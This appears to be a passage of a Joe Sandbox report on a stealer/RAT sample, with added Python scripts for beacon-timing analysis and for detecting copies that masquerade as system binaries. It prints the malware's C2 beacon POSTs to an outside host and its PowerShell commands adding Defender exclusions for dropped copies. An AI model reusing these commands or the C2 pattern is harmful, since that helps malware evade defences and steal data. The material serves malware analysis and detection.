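    """'Dec 9, 2024 16:02:10.227649927' -> datetime; nanoseconds truncated to microseconds."""
    head, _, frac = ts.rpartition(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def beacon_intervals(sessions):
    """Seconds between consecutive request timestamps, in time order."""
    times = sorted(parse_timestamp(s[1]) for s in sessions)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def median_interval(sessions):
    return median(beacon_intervals(sessions))


def constant_offsets(sessions):
    """Offsets whose byte is identical in every body preview.  Hypothesis: constant
    offsets are fixed fields (identifier/key material), the rest a counter or timestamp."""
    bodies = [bytes.fromhex(s[4]) for s in sessions]
    width = min(len(b) for b in bodies)
    return {i for i in range(width) if len({b[i] for b in bodies}) == 1}


if __name__ == "__main__":
    print("profile matches:", sum(matches_capture_profile(request_head(s[2], s[3])) for s in SESSIONS))
    print("median interval (s):", round(median_interval(SESSIONS), 3))
    print("constant offsets:", sorted(constant_offsets(SESSIONS)))
```

Two of the ten intervals are about 0.12 s rather than the 1.75 s cadence: sessions 31 and 36 carry the larger 1756- and 1720-byte uploads on their own connections and overlap the regular 1040-byte beacons of sessions 32 and 37, so a cadence check should be made per body size or per destination port rather than over the raw request stream. The constant offsets come out as 6, 8 to 12, 14, 16, 18, 20, 22 and everything from 24 on, with single varying bytes between the fixed ones at 13 to 23; what those fields mean is not established by the report.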


Session ID | Source IP   | Source Port | Destination IP | Destination Port
39         | 192.168.2.4 | 49997       | 37.44.238.250  | 80

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:23.370908976 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 306039cm.nyashcrack.top
Content-Length: 1040
Expect: 100-continue
Dec 9, 2024 16:02:23.719099998 CET | 1040 | OUT | Data Raw: 59 5d 5e 51 5a 47 59 5e 5c 5c 56 57 50 50 5b 50 5f 5f 59 5e 56 5c 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
Data Ascii: Y]^QZGY^\\VWPP[P__Y^V\QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#8""^ :%"%4%*#?B7$*69"?<(?(&^#,X
Dec 9, 2024 16:02:24.641576052 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:24.874121904 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3d 5d 5d 5a
Data Ascii: =]]Z



                                                                                              Target ID:0
                                                                                              Start time:09:59:43
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                                              Imagebase:0xf60000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
                                                                                              Imagebase:0x7ff7c67f0000
                                                                                              File size:2'759'232 bytes
                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                                              Imagebase:0x3d0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                                              Imagebase:0x240000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:09:59:49
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"
                                                                                              Imagebase:0x7ff6dd770000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:09:59:50
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Imagebase:0x920000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:09:59:50
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Imagebase:0x690000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:26
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:30
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

Target ID: 32
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 34
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 35
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 36
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 37
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 38
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
Imagebase: 0x7ff64b390000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 09:59:51
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 09:59:52
Start date: 09/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6239c0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 09:59:53
Start date: 09/12/2024
Path: C:\Users\user\Desktop\4si9noTBNw.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\4si9noTBNw.exe
Imagebase: 0x850000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 09:59:53
Start date: 09/12/2024
Path: C:\Users\user\Desktop\4si9noTBNw.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\4si9noTBNw.exe
Imagebase: 0xbd0000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 09:59:53
Start date: 09/12/2024
Path: C:\Program Files\Windows Defender\en-GB\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Imagebase: 0xa10000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Has exited: true

Target ID: 44
Start time: 09:59:53
Start date: 09/12/2024
Path: C:\Program Files\Windows Defender\en-GB\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Imagebase: 0x6c0000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 09:59:53
Start date: 09/12/2024
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping -n 10 localhost
Imagebase: 0x7ff7a6c10000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 09:59:58
Start date: 09/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 10:00:02
Start date: 09/12/2024
Path: C:\Recovery\VTixufCejPQZEvXiB.exe
Wow64 process (32bit): false
Commandline: "C:\Recovery\VTixufCejPQZEvXiB.exe"
Imagebase: 0x4c0000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 68%, ReversingLabs
Has exited: true

Target ID: 49
Start time: 10:00:04
Start date: 09/12/2024
Path: C:\Program Files\Windows Defender\en-GB\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Imagebase: 0x560000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 10:00:07
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 10:00:11
Start date: 09/12/2024
Path: C:\Users\Public\AccountPictures\winlogon.exe
Wow64 process (32bit): false
Commandline: "C:\Users\Public\AccountPictures\winlogon.exe"
Imagebase: 0xe70000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 10:00:19
Start date: 09/12/2024
Path: C:\Program Files\Windows Defender\en-GB\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Imagebase: 0xdd0000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 10:00:27
Start date: 09/12/2024
Path: C:\Users\user\Desktop\4si9noTBNw.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\4si9noTBNw.exe"
Imagebase: 0x980000
File size: 1'920'000 bytes
MD5 hash: 68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 55
Start time: 10:00:32
Start date: 09/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff6eef20000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false
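The three process records above show the submitted sample re-launched as C:\Program Files\Windows Defender\en-GB\conhost.exe with the same MD5 hash as the original file on the desktop, i.e. a copy masquerading as a Windows system binary from a directory where conhost.exe never lives. The Python script below is an added illustration and not part of the Joe Sandbox report: it parses process records in the Key:Value layout used above and flags (a) images that carry a System32 binary name but run from elsewhere and (b) processes whose MD5 equals the submitted sample's under a different path. The embedded records are constructed from the three entries above; the list of system image names is an assumption for the example and should be extended per environment.

```python
"""
Flag process records from a sandbox process list that (a) reuse a Windows
system binary name outside System32/SysWOW64 or (b) carry the submitted
sample's MD5 under a different path (a dropped, renamed copy).
"""
import re
from pathlib import PureWindowsPath

# Constructed from the three process records in this section of the report.
SAMPLE_RECORDS = r"""
Target ID:53
Start time:10:00:19
Start date:09/12/2024
Path:C:\Program Files\Windows Defender\en-GB\conhost.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\en-GB\conhost.exe"
Imagebase:0xdd0000
File size:1'920'000 bytes
MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges:false
Has administrator privileges:false
Has exited:true

Target ID:54
Start time:10:00:27
Start date:09/12/2024
Path:C:\Users\user\Desktop\4si9noTBNw.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\4si9noTBNw.exe"
Imagebase:0x980000
File size:1'920'000 bytes
MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
Has elevated privileges:false
Has administrator privileges:false
Has exited:false

Target ID:55
Start time:10:00:32
Start date:09/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Has exited:false
"""

# Submitted sample, as listed in the report.
SAMPLE_MD5 = "68EF473852D3AEFD8E5E4F2E00B3DFAA"
SAMPLE_PATH = r"C:\Users\user\Desktop\4si9noTBNw.exe"

# Assumed list of image names that legitimately live only in the system
# directories; extend for your environment.
SYSTEM_IMAGE_NAMES = {
    "conhost.exe", "svchost.exe", "csrss.exe", "lsass.exe", "services.exe",
    "winlogon.exe", "smss.exe", "wininit.exe", "dllhost.exe", "taskhostw.exe",
}
SYSTEM_DIRS = (
    PureWindowsPath(r"C:\Windows\System32"),
    PureWindowsPath(r"C:\Windows\SysWOW64"),
)


def parse_records(text):
    """Split blank-line-separated 'Key:Value' blocks into dicts."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")  # first ':' only; paths keep theirs
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def outside_system_dirs(path):
    """True if the image name is a system binary name but its directory is not."""
    p = PureWindowsPath(path)
    if p.name.lower() not in SYSTEM_IMAGE_NAMES:
        return False
    # PureWindowsPath compares case-insensitively, matching NTFS semantics.
    return not any(p.parent == d for d in SYSTEM_DIRS)


def find_anomalies(records, sample_md5, sample_path):
    """Return (target_id, reason, path) tuples for suspicious records."""
    findings = []
    for rec in records:
        path = rec.get("Path", "")
        tid = rec.get("Target ID", "?")
        if outside_system_dirs(path):
            findings.append((tid, "system image name outside System32/SysWOW64", path))
        md5 = rec.get("MD5 hash", "").lower()
        if md5 == sample_md5.lower() and PureWindowsPath(path) != PureWindowsPath(sample_path):
            findings.append((tid, "same MD5 as submitted sample under a different path", path))
    return findings


if __name__ == "__main__":
    for tid, reason, path in find_anomalies(parse_records(SAMPLE_RECORDS), SAMPLE_MD5, SAMPLE_PATH):
        print(f"Target {tid}: {reason}: {path}")
```

Run against the records above, only Target ID 53 is reported, on both grounds; the real svchost.exe (Target ID 55) passes because it runs from System32 with a different hash. The same two checks translate directly to a live host by feeding the output of Get-Process and Get-FileHash into find_anomalies.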


                                                                                                Execution Graph

                                                                                                Execution Coverage:9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:4
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph
                                                                                                  node 6987: 7ffd9bc7c94c
                                                                                                  node 6990: 7ffd9bc7c94f
                                                                                                  node 6988: 7ffd9bc7ca96 QueryFullProcessImageNameA
                                                                                                  node 6989: 7ffd9bc7caf4
                                                                                                  edges: 6987->6990, 6990->6988, 6990->6990, 6988->6989

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263
                                                                                                • Opcode ID: 92d2afdaabcf71dc4404574d3bb2811d20e1be54976a6c47368434e22945eae4
                                                                                                • Instruction ID: ed317ada52be318a8b6ed72acb74e10b50c1df325f812c99c81396fd2fe44544
                                                                                                • Opcode Fuzzy Hash: 92d2afdaabcf71dc4404574d3bb2811d20e1be54976a6c47368434e22945eae4
                                                                                                • Instruction Fuzzy Hash: C2910171A19E8D8FE759DF688869BA97FE1FB99304F4000BED059DB3E2DB7824118700

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5c9dfbad749fefabaa9c22527e78a0228a6955e812520a631be3388ca617fcd
                                                                                                • Instruction ID: 0a53e1e47baaf7d906908903439a69711b9bbe004bcf4cd8b19a67521ae0bfa6
                                                                                                • Opcode Fuzzy Hash: f5c9dfbad749fefabaa9c22527e78a0228a6955e812520a631be3388ca617fcd
                                                                                                • Instruction Fuzzy Hash: 25816F30608A4D8FDB68DF28D8957F937E1FF58316F14423EE84EC7292CA74A9458B81

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID: FullImageNameProcessQuery
                                                                                                • String ID:
                                                                                                • API String ID: 3578328331-0
